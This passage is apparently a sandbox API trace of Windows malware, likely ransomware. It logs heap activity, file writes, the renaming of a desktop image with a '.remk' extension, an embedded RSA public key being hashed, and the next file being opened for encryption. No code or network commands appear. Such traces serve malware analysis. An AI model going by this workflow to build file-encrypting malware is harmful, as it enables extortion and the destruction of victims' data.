RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0231.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c15a8 [0231.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede48 [0231.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c15f0 [0231.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede60 [0231.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede90 [0231.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edef0 [0231.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edea8 [0231.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0231.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0231.459] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede90 | out: hHeap=0x630000) returned 1 [0231.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edea8 | out: hHeap=0x630000) returned 1 [0231.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edef0 | out: hHeap=0x630000) returned 1 [0231.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0231.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0231.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edef0 [0231.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0231.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edea8 [0231.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0231.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ede90 [0231.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0231.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0231.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0231.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0231.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0231.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0231.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0231.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0231.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0231.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edea8 | out: hHeap=0x630000) returned 1 [0231.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0231.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede90 | out: hHeap=0x630000) returned 1 [0231.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0231.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0231.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edef0 | out: hHeap=0x630000) returned 1 [0231.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0231.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d69f0 | out: hHeap=0x630000) returned 1 [0231.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0231.460] GetCurrentThreadId () returned 0x314 [0231.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0231.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x6979a8 [0231.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0231.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0231.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x31a4298 [0231.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0231.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0231.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0231.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.461] GetCurrentThreadId () returned 0x314 [0231.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0231.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0231.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0231.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0231.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5968 [0231.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0231.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0231.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0231.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edef0 [0231.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0231.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0231.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0231.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0231.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0231.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0231.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0231.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0231.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede90 [0231.462] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0231.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0231.462] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0231.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0231.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0231.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0231.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0231.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edea8 [0231.462] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0231.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0231.462] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0231.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede78 [0231.462] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0231.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edf08 [0231.462] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0231.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0231.462] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0231.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eded8 [0231.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0231.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edec0 [0231.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0231.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edf20 [0231.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edec0 | out: hHeap=0x630000) returned 1 [0231.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edec0 [0231.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eded8 | out: hHeap=0x630000) returned 1 [0231.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0231.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0231.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0231.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0231.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0231.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede90 | out: hHeap=0x630000) returned 1 [0231.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede90 [0231.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0231.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0231.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edef0 | out: hHeap=0x630000) returned 1 [0231.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0231.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edf20 | out: hHeap=0x630000) returned 1 [0231.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x325d6d0 [0231.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0231.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x31b6580 [0231.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0231.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0231.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede90 | out: hHeap=0x630000) returned 1 [0231.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325d8e8 [0231.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0231.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0231.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0231.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0231.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0231.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0231.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0231.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0231.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0231.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d8e8 | out: hHeap=0x630000) returned 1 [0231.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0231.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0231.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edec0 | out: hHeap=0x630000) returned 1 [0231.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0231.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edf08 | out: hHeap=0x630000) returned 1 [0231.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0231.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edea8 | out: hHeap=0x630000) returned 1 [0231.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede78 | out: hHeap=0x630000) returned 1 [0231.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0231.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0231.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0231.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede60 | out: hHeap=0x630000) returned 1 [0231.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c15f0 | out: hHeap=0x630000) returned 1 [0231.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0231.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0231.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0231.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0231.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0231.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0231.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0231.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0231.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0231.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0231.465] WriteFile (in: hFile=0x640, lpBuffer=0x37c2278*, nNumberOfBytesToWrite=0xb8b7, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c2278*, lpNumberOfBytesWritten=0x3adfb14*=0xb8b7, lpOverlapped=0x0) returned 1 [0231.466] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c2278 | out: hHeap=0x630000) returned 1 [0231.466] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xb8bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.466] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.466] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0231.466] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0231.466] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0231.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0231.466] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x325d6d0 [0231.466] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0231.466] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0231.466] WriteFile (in: hFile=0x640, lpBuffer=0x325d6d0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x325d6d0*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0231.466] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0231.466] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.466] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.467] CloseHandle (hObject=0x640) returned 1 [0231.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0231.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b5b70 [0231.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0231.470] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p6ekR 2Fq3NJCopO9.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p6ekr 2fq3njcopo9.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p6ekR 2Fq3NJCopO9.jpg.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p6ekr 2fq3njcopo9.jpg.remk")) returned 1 [0231.471] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0231.471] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.471] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0231.472] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0231.473] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36b1d7d0, ftCreationTime.dwHighDateTime=0x1d5e7fb, ftLastAccessTime.dwLowDateTime=0xbb582430, ftLastAccessTime.dwHighDateTime=0x1d5d865, ftLastWriteTime.dwLowDateTime=0xbb582430, ftLastWriteTime.dwHighDateTime=0x1d5d865, nFileSizeHigh=0x0, nFileSizeLow=0x16114, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pqz2j.flv", cAlternateFileName="")) returned 1 [0231.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0231.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x693330 [0231.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0231.473] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Pqz2j.flv") returned=".flv" [0231.473] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Pqz2j.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pqz2j.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.473] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=90388) returned 1 [0231.473] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.476] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x160ee, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.476] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.478] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0231.479] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x16114, lpOverlapped=0x0) returned 1 [0231.480] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.480] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.480] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.480] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.480] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.481] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.481] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.481] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.481] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.481] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.481] GetLastError () returned 0x0 [0231.481] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.481] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0231.481] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.481] UuidToStringA (in: 